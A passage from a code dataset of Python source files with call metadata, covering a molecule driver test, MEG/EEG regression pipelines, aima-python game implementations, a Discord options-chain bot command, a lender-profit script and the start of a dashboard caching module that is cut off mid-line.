((40, 23, 40, 44), 'library.get_bucket', 'library.get_bucket', ({(40, 42, 40, 43): 'k'}, {}), '(k)', False, 'import library\n'), ((44, 8, 44, 35), 'library.put', 'library.put', ({(44, 20, 44, 27): '"""model"""', (44, 29, 44, 34): 'model'}, {}), "('model', model)", False, 'import library\n'), ((45, 8, 45, 37), 'library.put', 'library.put', ({(45, 20, 45, 27): '"""ROUND"""', (45, 29, 45, 36): '(ROUND + 1)'}, {}), "('ROUND', ROUND + 1)", False, 'import library\n')]
ragingpastry/molecule-ignite
molecule_ignite/test/unit/test_driver.py
aaf005cabba9a8c933191458cf8553da9bac581d
from molecule import api def test_driver_is_detected(): driver_name = __name__.split(".")[0].split("_")[-1] assert driver_name in [str(d) for d in api.drivers()]
[((6, 43, 6, 56), 'molecule.api.drivers', 'api.drivers', ({}, {}), '()', False, 'from molecule import api\n')]
dengemann/meegpowreg
coffeine/pipelines.py
e9cc8f2372f8b8ef4b372bfea113ed0b9646cb39
import numpy as np from coffeine.covariance_transformers import ( Diag, LogDiag, ExpandFeatures, Riemann, RiemannSnp, NaiveVec) from coffeine.spatial_filters import ( ProjIdentitySpace, ProjCommonSpace, ProjLWSpace, ProjRandomSpace, ProjSPoCSpace) from sklearn.compose import make_column_transformer from sklearn.pipeline import make_pipeline from sklearn.preprocessing import StandardScaler from sklearn.linear_model import RidgeCV, LogisticRegression def make_filter_bank_transformer(names, method='riemann', projection_params=None, vectorization_params=None, categorical_interaction=None): """Generate pipeline for filterbank models. Prepare filter bank models as used in [1]_. These models take as input sensor-space covariance matrices computed from M/EEG signals in different frequency bands. Then transformations are applied to improve the applicability of linear regression techniques by reducing the impact of field spread. In terms of implementation, this involves 1) projection (e.g. spatial filters) and 2) vectorization (e.g. taking the log on the diagonal). .. note:: The resulting model expects as inputs data frames in which different covarances (e.g. for different frequencies) are stored inside columns indexed by ``names``. Other columns will be passed through by the underlying column transformers. The pipeline also supports fitting categorical interaction effects after projection and vectorization steps are performed. .. note:: All essential methods from [1]_ are implemented here. In practice, we recommend comparing `riemann', `spoc' and `diag' as a baseline. Parameters ---------- names : list of str The column names of the data frame corresponding to different covariances. method : str The method used for extracting features from covariances. Defaults to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``, ``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``, ``'riemann_wasserstein'``. projection_params : dict | None The parameters for the projection step. vectorization_params : dict | None The parameters for the vectorization step. categorical_interaction : str The column in the input data frame containing a binary descriptor used to fit 2-way interaction effects. References ---------- [1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann. Predictive regression modeling with MEG/EEG: from source power to signals and cognitive states. *NeuroImage*, page 116893,2020. ISSN 1053-8119. https://doi.org/10.1016/j.neuroimage.2020.116893 """ # put defaults here for projection and vectorization step projection_defaults = { 'riemann': dict(scale=1, n_compo='full', reg=1.e-05), 'lw_riemann': dict(shrink=1), 'diag': dict(), 'log_diag': dict(), 'random': dict(n_compo='full'), 'naive': dict(), 'spoc': dict(n_compo='full', scale='auto', reg=1.e-05, shrink=1), 'riemann_wasserstein': dict() } vectorization_defaults = { 'riemann': dict(metric='riemann'), 'lw_riemann': dict(metric='riemann'), 'diag': dict(), 'log_diag': dict(), 'random': dict(), 'naive': dict(method='upper'), 'spoc': dict(), 'riemann_wasserstein': dict(rank='full') } assert set(projection_defaults) == set(vectorization_defaults) if method not in projection_defaults: raise ValueError( f"The `method` ('{method}') you specified is unknown.") # update defaults projection_params_ = projection_defaults[method] if projection_params is not None: projection_params_.update(**projection_params) vectorization_params_ = vectorization_defaults[method] if vectorization_params is not None: vectorization_params_.update(**vectorization_params) def _get_projector_vectorizer(projection, vectorization): return [(make_pipeline(* [projection(**projection_params_), vectorization(**vectorization_params_)]), name) for name in names] # setup pipelines (projection + vectorization step) steps = tuple() if method == 'riemann': steps = (ProjCommonSpace, Riemann) elif method == 'lw_riemann': steps = (ProjLWSpace, Riemann) elif method == 'diag': steps = (ProjIdentitySpace, Diag) elif method == 'log_diag': steps = (ProjIdentitySpace, LogDiag) elif method == 'random': steps = (ProjRandomSpace, LogDiag) elif method == 'naive': steps = (ProjIdentitySpace, NaiveVec) elif method == 'spoc': steps = (ProjSPoCSpace, LogDiag) elif method == 'riemann_wasserstein': steps = (ProjIdentitySpace, RiemannSnp) filter_bank_transformer = make_column_transformer( *_get_projector_vectorizer(*steps), remainder='passthrough') if categorical_interaction is not None: filter_bank_transformer = ExpandFeatures( filter_bank_transformer, expander_column=categorical_interaction) return filter_bank_transformer def make_filter_bank_regressor(names, method='riemann', projection_params=None, vectorization_params=None, categorical_interaction=None, scaling=None, estimator=None): """Generate pipeline for regression with filter bank model. Prepare filter bank models as used in [1]_. These models take as input sensor-space covariance matrices computed from M/EEG signals in different frequency bands. Then transformations are applied to improve the applicability of linear regression techniques by reducing the impact of field spread. In terms of implementation, this involves 1) projection (e.g. spatial filters) and 2) vectorization (e.g. taking the log on the diagonal). .. note:: The resulting model expects as inputs data frames in which different covarances (e.g. for different frequencies) are stored inside columns indexed by ``names``. Other columns will be passed through by the underlying column transformers. The pipeline also supports fitting categorical interaction effects after projection and vectorization steps are performed. .. note:: All essential methods from [1]_ are implemented here. In practice, we recommend comparing `riemann', `spoc' and `diag' as a baseline. Parameters ---------- names : list of str The column names of the data frame corresponding to different covariances. method : str The method used for extracting features from covariances. Defaults to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``, ``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``, ``'riemann_wasserstein'``. projection_params : dict | None The parameters for the projection step. vectorization_params : dict | None The parameters for the vectorization step. categorical_interaction : str The column in the input data frame containing a binary descriptor used to fit 2-way interaction effects. scaling : scikit-learn Transformer object | None Method for re-rescaling the features. Defaults to None. If None, StandardScaler is used. estimator : scikit-learn Estimator object. The estimator object. Defaults to None. If None, RidgeCV is performed with default values. References ---------- [1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann. Predictive regression modeling with MEG/EEG: from source power to signals and cognitive states. *NeuroImage*, page 116893,2020. ISSN 1053-8119. https://doi.org/10.1016/j.neuroimage.2020.116893 """ filter_bank_transformer = make_filter_bank_transformer( names=names, method=method, projection_params=projection_params, vectorization_params=vectorization_params, categorical_interaction=categorical_interaction ) scaling_ = scaling if scaling_ is None: scaling_ = StandardScaler() estimator_ = estimator if estimator_ is None: estimator_ = RidgeCV(alphas=np.logspace(-3, 5, 100)) filter_bank_regressor = make_pipeline( filter_bank_transformer, scaling_, estimator_ ) return filter_bank_regressor def make_filter_bank_classifier(names, method='riemann', projection_params=None, vectorization_params=None, categorical_interaction=None, scaling=None, estimator=None): """Generate pipeline for classification with filter bank model. Prepare filter bank models as used in [1]_. These models take as input sensor-space covariance matrices computed from M/EEG signals in different frequency bands. Then transformations are applied to improve the applicability of linear regression techniques by reducing the impact of field spread. In terms of implementation, this involves 1) projection (e.g. spatial filters) and 2) vectorization (e.g. taking the log on the diagonal). .. note:: The resulting model expects as inputs data frames in which different covarances (e.g. for different frequencies) are stored inside columns indexed by ``names``. Other columns will be passed through by the underlying column transformers. The pipeline also supports fitting categorical interaction effects after projection and vectorization steps are performed. .. note:: All essential methods from [1]_ are implemented here. In practice, we recommend comparing `riemann', `spoc' and `diag' as a baseline. Parameters ---------- names : list of str The column names of the data frame corresponding to different covariances. method : str The method used for extracting features from covariances. Defaults to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``, ``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``, ``'riemann_wasserstein'``. projection_params : dict | None The parameters for the projection step. vectorization_params : dict | None The parameters for the vectorization step. categorical_interaction : str The column in the input data frame containing a binary descriptor used to fit 2-way interaction effects. scaling : scikit-learn Transformer object | None Method for re-rescaling the features. Defaults to None. If None, StandardScaler is used. estimator : scikit-learn Estimator object. The estimator object. Defaults to None. If None, LogisticRegression is performed with default values. References ---------- [1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann. Predictive regression modeling with MEG/EEG: from source power to signals and cognitive states. *NeuroImage*, page 116893,2020. ISSN 1053-8119. https://doi.org/10.1016/j.neuroimage.2020.116893 """ filter_bank_transformer = make_filter_bank_transformer( names=names, method=method, projection_params=projection_params, vectorization_params=vectorization_params, categorical_interaction=categorical_interaction ) scaling_ = scaling if scaling_ is None: scaling_ = StandardScaler() estimator_ = estimator if estimator_ is None: estimator_ = LogisticRegression(solver='liblinear') filter_bank_regressor = make_pipeline( filter_bank_transformer, scaling_, estimator_ ) return filter_bank_regressor
[((233, 28, 237, 5), 'sklearn.pipeline.make_pipeline', 'make_pipeline', ({(234, 8, 234, 31): 'filter_bank_transformer', (235, 8, 235, 16): 'scaling_', (236, 8, 236, 18): 'estimator_'}, {}), '(filter_bank_transformer, scaling_, estimator_)', False, 'from sklearn.pipeline import make_pipeline\n'), ((321, 28, 325, 5), 'sklearn.pipeline.make_pipeline', 'make_pipeline', ({(322, 8, 322, 31): 'filter_bank_transformer', (323, 8, 323, 16): 'scaling_', (324, 8, 324, 18): 'estimator_'}, {}), '(filter_bank_transformer, scaling_, estimator_)', False, 'from sklearn.pipeline import make_pipeline\n'), ((148, 34, 149, 77), 'coffeine.covariance_transformers.ExpandFeatures', 'ExpandFeatures', (), '', False, 'from coffeine.covariance_transformers import Diag, LogDiag, ExpandFeatures, Riemann, RiemannSnp, NaiveVec\n'), ((227, 19, 227, 35), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((315, 19, 315, 35), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((319, 21, 319, 59), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import RidgeCV, LogisticRegression\n'), ((231, 36, 231, 59), 'numpy.logspace', 'np.logspace', ({(231, 48, 231, 50): '-3', (231, 52, 231, 53): '5', (231, 55, 231, 58): '100'}, {}), '(-3, 5, 100)', True, 'import numpy as np\n')]
dysomni/aima-python
submissions/Chouard/mygames.py
c67104e50007ec5ac2a9aa37f0cb972cb6315528
from games import Game from math import nan, isnan from queue import PriorityQueue from copy import deepcopy from utils import isnumber from grading.util import print_table class GameState: def __init__(self, to_move, position, board, label=None): self.to_move = to_move self.position = position self.board = board self.label = label self.scores = {'H': 0, 'V': 0} def __str__(self): if self.label == None: return super(GameState, self).__str__() return self.label class Move: def __init__(self, r, c, v): self.row = r self.col = c self.value = v def rcv(self): return self.row, self.col, self.value def __lt__(self, other): return self.value > other.value def q2list(mq): list = [] while not mq.empty(): list.append(mq.get(1).rcv()) return list def movesInRow(board, r): mQueue = PriorityQueue() row = board[r] for c in range(len(row)): if isnan(row[c]): continue v = row[c] move = Move(r, c, v) mQueue.put(move) return q2list(mQueue) def movesInCol(board, c): mQueue = PriorityQueue() for r in range(len(board)): if isnan(board[r][c]): continue v = board[r][c] move = Move(r, c, v) mQueue.put(move) return q2list(mQueue) class ThinkAhead(Game): """ An implementation of ThinkAhead """ def __init__(self, state): self.initial = state def actions(self, state): "Legal moves are any square not yet taken." r, c = state.position if state.to_move == 'H': moves = movesInRow(state.board, r) return moves if state.to_move == 'V': moves = movesInCol(state.board, c) return moves return [] # defines the order of play def opponent(self, player): if player == 'H': return 'V' if player == 'V': return 'H' return None def result(self, state, move): r, c, v = move assert state.board[r][c] == v currMover = state.to_move nextMover = self.opponent(currMover) newState = deepcopy(state) newState.to_move = nextMover newState.position = r, c newState.board[r][c] = nan newState.scores[currMover] += v return newState def utility(self, state, player): "Player relative score" opponent = self.opponent(player) return state.scores[player] - state.scores[opponent] def terminal_test(self, state): "A state is terminal if it is won or there are no empty squares." return len(self.actions(state)) == 0 def display(self, state): print_table(state.board, njust='center', sep=',') print('Score: ' + str(state.scores)) won = GameState( to_move='H', position=(0, 1), board=[[nan, nan], [9, nan]], label='won' ) won.scores = {'H': 9, 'V': 0} lost = GameState( to_move='V', position=(0, 1), board=[[nan, nan], [9, nan]], label='lost' ) lost.scores = {'H': 0, 'V': 9} winin1 = GameState( to_move='H', position=(1, 1), board=[[nan, nan], [9, nan]], label='winin1' ) losein1 = GameState( to_move='V', position=(0, 0), board=[[nan, nan], [9, nan]], label='losein1' ) winin2 = GameState( to_move='H', position=(0, 0), board=[[nan, 3, 2], [nan, 9, nan], [nan, nan, 1]], label='winin2' ) losein2 = GameState( to_move='V', position=(0, 0), board=[[nan, nan, nan], [3, 9, nan], [2, nan, 1]], label='losein2' ) losein2.maxDepth = 3 # http://www.kongregate.com/games/zolli/thinkahead-brain-trainer stolen = GameState( to_move='H', position=(3, 1), board=[[3, 8, 9, 5], [9, 1, 3, 2], [8, 6, 4, 4], [9, nan, 1, 5]], label='stolen' ) choose1 = GameState( to_move='H', position=(1, 0), board=[[3, 8, 9, 5], [nan, 1, 3, 2], [8, 6, 4, 4], [nan, nan, 1, 5]], label='choose1' ) winby10 = GameState( to_move='H', position=(2, 0), board=[[nan, nan, nan, nan], [nan, nan, nan, nan], [nan, 6, 4, 5], [nan, nan, 1, 3]], label='winby10' ) thinkA = ThinkAhead(stolen) def availableMoves(board): sides = ['T', 'B', 'L', 'R'] moves = PriorityQueue() for row in range(0, len(board)): for col in range(0, len(board)): if board[row][col]['winner'] == '': for side in sides: if side not in board[row][col]['lines']: moves.put((row, col, side)) moveList = [] while not moves.empty(): moveList.append(moves.get(1)) return moveList def applyMove(board, size, row, col, side, currMover): board[row][col]['lines'].append(side) if row <= size - 1 and row != 0 and side == 'T': board[row - 1][col]['lines'].append('B') if row >= 0 and row != size - 1 and side == 'B': board[row + 1][col]['lines'].append('T') if col <= size - 1 and col != 0 and side == 'L': board[row][col - 1]['lines'].append('R') if col >= 0 and col != size - 1 and side == 'R': board[row][col + 1]['lines'].append('L') sides = ['T', 'B', 'L', 'R'] complete = True for side in sides: if side in board[row][col]['lines']: continue complete = False if complete: board[row][col]['winner'] = currMover return board def countScore(board): scores = {'A': 0, 'B': 0} for row in range(0, len(board)): for col in range(0, len(board)): if board[row][col]['winner'] == 'A': scores['A'] += 1 if board[row][col]['winner'] == 'B': scores['B'] += 1 return scores board = ''' *** *** *** ''' def printDotsBoard(board): board_string = '' for row in range(0, len(board)): for col in range(0, len(board[row])): board_string += '*' if 'T' in board[row][col]['lines']: board_string += '---' else: board_string += ' ' if col == len(board[row]) - 1: board_string += '*\n' for space in range(0, len(board[row])): if 'L' in board[row][space]['lines']: board_string += '| ' else: board_string += ' ' if '' != board[row][space]['winner']: board_string += board[row][space]['winner'] else: board_string += ' ' if space == len(board[row]) - 1 and 'R' in board[row][space]['lines']: board_string += ' |' else: board_string += ' ' board_string += '\n' if row == len(board) - 1: for col in range(0, len(board[row])): board_string += '*' if 'B' in board[row][col]['lines']: board_string += '---' else: board_string += ' ' board_string += '*' print(board_string) class DotLineState: def __init__(self, to_move, board, label=None, scores={'A': 0, 'B': 0}): self.to_move = to_move self.board = board self.label = label self.scores = scores def __str__(self): if self.label is None: return super(DotLineState, self).__str__() return self.label class DotsAndLines(Game): """ An implementation of Dots and Lines """ def __init__(self, state): self.initial = state self.size = len(state.board) def actions(self, state): "Legal moves are any square not yet taken." moves = availableMoves(state.board) return moves # defines the order of play def opponent(self, player): if player == 'A': return 'B' if player == 'B': return 'A' return None def result(self, state, move): row, col, side = move currMover = state.to_move nextMover = self.opponent(currMover) newState = deepcopy(state) newState.to_move = nextMover newState.board = applyMove(newState.board, self.size, row, col, side, currMover) newState.scores = countScore(newState.board) return newState def utility(self, state, player): "Player relative score" opponent = self.opponent(player) return state.scores[player] - state.scores[opponent] def terminal_test(self, state): "A state is terminal if it is won or there are no empty squares." return len(self.actions(state)) == 0 def display(self, state): # print_table(state.board, njust='center', sep=',') printDotsBoard(state.board) print('Score: ' + str(state.scores)) ''' Board represents the squares, whether the top, bottom, left, and right have been filled, and which player owns the square. ''' dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}], [{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]] won = DotLineState(board=dotLineBoard, to_move='A', label='Won', scores={'A': 3, 'B': 1}) dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}], [{'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]] lost = DotLineState(board=dotLineBoard, to_move='A', label='Lost', scores={'A': 1, 'B': 3}) dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}], [{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]] tied = DotLineState(board=dotLineBoard, to_move='A', label='Tied', scores={'A': 2, 'B': 2}) dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}], [{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': '', 'lines': ['T', 'L']}]] winin1Dots = DotLineState(board=dotLineBoard, to_move='A', label='Win in 1', scores={'A': 2, 'B': 1}) dotLineBoard = [[{'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['T', 'L']}, {'winner': '', 'lines': ['R']}], [{'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['L', 'R']}], [{'winner': '', 'lines': ['B', 'L', 'R']}, {'winner': '', 'lines': ['L', 'B']}, {'winner': '', 'lines': ['B', 'R']}], ] winIn5_3x3 = DotLineState(board=dotLineBoard, to_move='A', label='Win in 5', scores={'A': 0, 'B': 0}) play = DotLineState( board=[[{'winner': '', 'lines': []}, {'winner': '', 'lines': []}], [{'winner': '', 'lines': []}, {'winner': '', 'lines': []}]], to_move='A', label='Start') #amended by whh dotLine = DotsAndLines(play) #dotLine = DotsAndLines(winIn5_3x3) myGames = { dotLine: [ won, lost, tied, winin1Dots, winIn5_3x3, play ] }
[((44, 13, 44, 28), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((56, 13, 56, 28), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((211, 12, 211, 27), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((47, 11, 47, 24), 'math.isnan', 'isnan', ({(47, 17, 47, 23): 'row[c]'}, {}), '(row[c])', False, 'from math import nan, isnan\n'), ((58, 11, 58, 29), 'math.isnan', 'isnan', ({(58, 17, 58, 28): 'board[r][c]'}, {}), '(board[r][c])', False, 'from math import nan, isnan\n'), ((100, 19, 100, 34), 'copy.deepcopy', 'deepcopy', ({(100, 28, 100, 33): 'state'}, {}), '(state)', False, 'from copy import deepcopy\n'), ((117, 8, 117, 57), 'grading.util.print_table', 'print_table', (), '', False, 'from grading.util import print_table\n'), ((341, 19, 341, 34), 'copy.deepcopy', 'deepcopy', ({(341, 28, 341, 33): 'state'}, {}), '(state)', False, 'from copy import deepcopy\n')]
minhhoang1023/GamestonkTerminal
discordbot/stocks/options/opt_chain.py
195dc19b491052df080178c0cc6a9d535a91a704
import os import df2img import disnake import numpy as np import pandas as pd from menus.menu import Menu from PIL import Image import discordbot.config_discordbot as cfg from discordbot.config_discordbot import gst_imgur, logger from discordbot.helpers import autocrop_image from gamestonk_terminal.stocks.options import yfinance_model async def chain_command( ctx, ticker: str = None, expiry: str = None, opt_type: str = None, min_sp: float = None, max_sp: float = None, ): """Show calls/puts for given ticker and expiration""" try: # Debug if cfg.DEBUG: logger.debug( "opt-chain %s %s %s %s %s", ticker, expiry, opt_type, min_sp, max_sp ) # Check for argument if not ticker: raise Exception("Stock ticker is required") dates = yfinance_model.option_expirations(ticker) if not dates: raise Exception("Stock ticker is invalid") options = yfinance_model.get_option_chain(ticker, str(expiry)) calls_df = options.calls puts_df = options.puts column_map = {"openInterest": "oi", "volume": "vol", "impliedVolatility": "iv"} columns = [ "strike", "bid", "ask", "volume", "openInterest", "impliedVolatility", ] if opt_type == "Calls": df = calls_df[columns].rename(columns=column_map) if opt_type == "Puts": df = puts_df[columns].rename(columns=column_map) min_strike = np.percentile(df["strike"], 1) max_strike = np.percentile(df["strike"], 100) if min_sp: min_strike = min_sp if max_sp: max_strike = max_sp if min_sp > max_sp: # type: ignore min_sp, max_sp = max_strike, min_strike df = df[df["strike"] >= min_strike] df = df[df["strike"] <= max_strike] df["iv"] = pd.to_numeric(df["iv"].astype(float)) formats = {"iv": "{:.2f}"} for col, f in formats.items(): df[col] = df[col].map(lambda x: f.format(x)) # pylint: disable=W0640 df.set_index("strike", inplace=True) title = f"Stocks: {opt_type} Option Chain for {ticker.upper()} on {expiry} [yfinance]" embeds: list = [] # Weekly Calls Pages i, i2, end = 0, 0, 20 df_pg = [] embeds_img = [] dindex = len(df.index) while i < dindex: df_pg = df.iloc[i:end] df_pg.append(df_pg) figp = df2img.plot_dataframe( df_pg, fig_size=(1000, (40 + (40 * 20))), col_width=[3, 3, 3, 3], tbl_cells=dict( height=35, ), font=dict( family="Consolas", size=20, ), template="plotly_dark", paper_bgcolor="rgba(0, 0, 0, 0)", ) imagefile = f"opt-chain{i}.png" df2img.save_dataframe(fig=figp, filename=imagefile) image = Image.open(imagefile) image = autocrop_image(image, 0) image.save(imagefile, "PNG", quality=100) uploaded_image = gst_imgur.upload_image(imagefile, title="something") image_link = uploaded_image.link embeds_img.append( f"{image_link}", ) embeds.append( disnake.Embed( title=title, colour=cfg.COLOR, ), ) i2 += 1 i += 20 end += 20 os.remove(imagefile) # Author/Footer for i in range(0, i2): embeds[i].set_author( name=cfg.AUTHOR_NAME, url=cfg.AUTHOR_URL, icon_url=cfg.AUTHOR_ICON_URL, ) embeds[i].set_footer( text=cfg.AUTHOR_NAME, icon_url=cfg.AUTHOR_ICON_URL, ) i = 0 for i in range(0, i2): embeds[i].set_image(url=embeds_img[i]) i += 1 embeds[0].set_footer(text=f"Page 1 of {len(embeds)}") options = [ disnake.SelectOption(label="Home", value="0", emoji="🟢"), ] await ctx.send(embed=embeds[0], view=Menu(embeds, options)) except Exception as e: embed = disnake.Embed( title="ERROR Stock-Options: Expirations", colour=cfg.COLOR, description=e, ) embed.set_author( name=cfg.AUTHOR_NAME, icon_url=cfg.AUTHOR_ICON_URL, ) await ctx.send(embed=embed, delete_after=30.0)
[((36, 16, 36, 57), 'gamestonk_terminal.stocks.options.yfinance_model.option_expirations', 'yfinance_model.option_expirations', ({(36, 50, 36, 56): 'ticker'}, {}), '(ticker)', False, 'from gamestonk_terminal.stocks.options import yfinance_model\n'), ((60, 21, 60, 51), 'numpy.percentile', 'np.percentile', ({(60, 35, 60, 47): "df['strike']", (60, 49, 60, 50): '1'}, {}), "(df['strike'], 1)", True, 'import numpy as np\n'), ((61, 21, 61, 53), 'numpy.percentile', 'np.percentile', ({(61, 35, 61, 47): "df['strike']", (61, 49, 61, 52): '100'}, {}), "(df['strike'], 100)", True, 'import numpy as np\n'), ((28, 12, 30, 13), 'discordbot.config_discordbot.logger.debug', 'logger.debug', ({(29, 16, 29, 42): '"""opt-chain %s %s %s %s %s"""', (29, 44, 29, 50): 'ticker', (29, 52, 29, 58): 'expiry', (29, 60, 29, 68): 'opt_type', (29, 70, 29, 76): 'min_sp', (29, 78, 29, 84): 'max_sp'}, {}), "('opt-chain %s %s %s %s %s', ticker, expiry, opt_type, min_sp,\n max_sp)", False, 'from discordbot.config_discordbot import gst_imgur, logger\n'), ((107, 12, 107, 63), 'df2img.save_dataframe', 'df2img.save_dataframe', (), '', False, 'import df2img\n'), ((108, 20, 108, 41), 'PIL.Image.open', 'Image.open', ({(108, 31, 108, 40): 'imagefile'}, {}), '(imagefile)', False, 'from PIL import Image\n'), ((109, 20, 109, 44), 'discordbot.helpers.autocrop_image', 'autocrop_image', ({(109, 35, 109, 40): 'image', (109, 42, 109, 43): '0'}, {}), '(image, 0)', False, 'from discordbot.helpers import autocrop_image\n'), ((112, 29, 112, 81), 'discordbot.config_discordbot.gst_imgur.upload_image', 'gst_imgur.upload_image', (), '', False, 'from discordbot.config_discordbot import gst_imgur, logger\n'), ((126, 12, 126, 32), 'os.remove', 'os.remove', ({(126, 22, 126, 31): 'imagefile'}, {}), '(imagefile)', False, 'import os\n'), ((147, 12, 147, 71), 'disnake.SelectOption', 'disnake.SelectOption', (), '', False, 'import disnake\n'), ((153, 16, 157, 9), 'disnake.Embed', 'disnake.Embed', (), '', False, 'import disnake\n'), ((118, 16, 121, 17), 'disnake.Embed', 'disnake.Embed', (), '', False, 'import disnake\n'), ((150, 45, 150, 66), 'menus.menu.Menu', 'Menu', ({(150, 50, 150, 56): 'embeds', (150, 58, 150, 65): 'options'}, {}), '(embeds, options)', False, 'from menus.menu import Menu\n')]
xujiahuayz/premfin
scripts/get_lenderprofit.py
0e90d876ef7c9ef4f3da7d4842b8ec5ae9ac7e68
#%% import packages import numpy as np import pandas as pd import multiprocessing from time import time import json from premiumFinance.constants import ( MORTALITY_TABLE_CLEANED_PATH, PROCESSED_PROFITABILITY_PATH, ) from premiumFinance.financing import calculate_lender_profit, yield_curve mortality_experience = pd.read_excel(MORTALITY_TABLE_CLEANED_PATH) #%% calculate profit rate def get_average_profitability( is_level_premium=True, lapse_assumption=True, policyholder_rate=yield_curve, statutory_interest=0.035, premium_markup=0.0, cash_interest=0.001, lender_coc=0.01, data_frame=mortality_experience, ): profit_columns = data_frame.apply( lambda row: calculate_lender_profit( row=row, is_level_premium=is_level_premium, lapse_assumption=lapse_assumption, policyholder_rate=policyholder_rate, statutory_interest=statutory_interest, premium_markup=premium_markup, cash_interest=cash_interest, lender_coc=lender_coc, ), axis=1, result_type="expand", ) data_frame[["Breakeven Loan rate", "Lender profit"]] = profit_columns data_frame["Dollar profit"] = ( data_frame["Lender profit"] * data_frame["Amount Exposed"] ) average_profitability = ( data_frame["Dollar profit"].sum() / data_frame["Amount Exposed"].sum() ) return average_profitability, data_frame def tempfunc_t(x): a, _ = get_average_profitability(lender_coc=x, lapse_assumption=True) return a def tempfunc_f(x): a, _ = get_average_profitability(lender_coc=x, lapse_assumption=False) return a lender_coc_value = np.arange(start=0.01, stop=0.2, step=0.01) #%% tbd if __name__ == "__main__": pool = multiprocessing.Pool() start_time = time() foo = [] for tempfunc in (tempfunc_t, tempfunc_f): foo.append( pool.map( tempfunc, lender_coc_value, ) ) print(f"it took {time() - start_time}") lender_profitability = { "lender_coc": lender_coc_value.tolist(), "profitability": foo, } with open(PROCESSED_PROFITABILITY_PATH, "w") as outfile: json.dump(lender_profitability, outfile)
[((15, 23, 15, 66), 'pandas.read_excel', 'pd.read_excel', ({(15, 37, 15, 65): 'MORTALITY_TABLE_CLEANED_PATH'}, {}), '(MORTALITY_TABLE_CLEANED_PATH)', True, 'import pandas as pd\n'), ((64, 19, 64, 61), 'numpy.arange', 'np.arange', (), '', True, 'import numpy as np\n'), ((69, 11, 69, 33), 'multiprocessing.Pool', 'multiprocessing.Pool', ({}, {}), '()', False, 'import multiprocessing\n'), ((71, 17, 71, 23), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n'), ((86, 8, 86, 48), 'json.dump', 'json.dump', ({(86, 18, 86, 38): 'lender_profitability', (86, 40, 86, 47): 'outfile'}, {}), '(lender_profitability, outfile)', False, 'import json\n'), ((29, 20, 38, 9), 'premiumFinance.financing.calculate_lender_profit', 'calculate_lender_profit', (), '', False, 'from premiumFinance.financing import calculate_lender_profit, yield_curve\n'), ((80, 21, 80, 27), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n')]
BearerPipelineTest/catapult
dashboard/dashboard/common/layered_cache.py
3800a67cd916200046a50748893bbd0dcf3d7f4a
# Copyright 2018 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Caches processed query results in memcache and datastore. Memcache is not very reliable for the perf dashboard. Prometheus team explained that memcache is LRU and shared between multiple applications, so their activity may result in our data being evicted. To prevent this, we cache processed query results in the data store. Using NDB, the values are also cached in memcache if possible. This improves performance because doing a get() for a key which has a single BlobProperty is much quicker than a complex query over a large dataset. (Background: http://g/prometheus-discuss/othVtufGIyM/wjAS5djyG8kJ) When an item is cached, layered_cache does the following: 1) Namespaces the key based on whether datastore_hooks says the request is internal_only. 2) Pickles the value (memcache does this internally), and adds a data store entity with the key and a BlobProperty with the pickled value. Retrieving values checks memcache via NDB first, and if datastore is used it unpickles. When an item is removed from the the cache, it is removed from both internal and external caches, since removals are usually caused by large changes that affect both caches. Although this module contains ndb.Model classes, these are not intended to be used directly by other modules. """ from __future__ import print_function from __future__ import division from __future__ import absolute_import import six.moves.cPickle as cPickle import datetime import logging from google.appengine.api import datastore_errors from google.appengine.runtime import apiproxy_errors from google.appengine.ext import ndb from dashboard.common import datastore_hooks from dashboard.common import namespaced_stored_object from dashboard.common import stored_object class CachedPickledString(ndb.Model): value = ndb.BlobProperty() expire_time = ndb.DateTimeProperty() @classmethod def NamespacedKey(cls, key, namespace): return ndb.Key(cls.__name__, namespaced_stored_object.NamespaceKey(key, namespace)) @classmethod def GetExpiredKeys(cls): """Gets keys of expired entities. Returns: List of keys for items which are expired. """ current_time = datetime.datetime.now() query = cls.query(cls.expire_time < current_time) query = 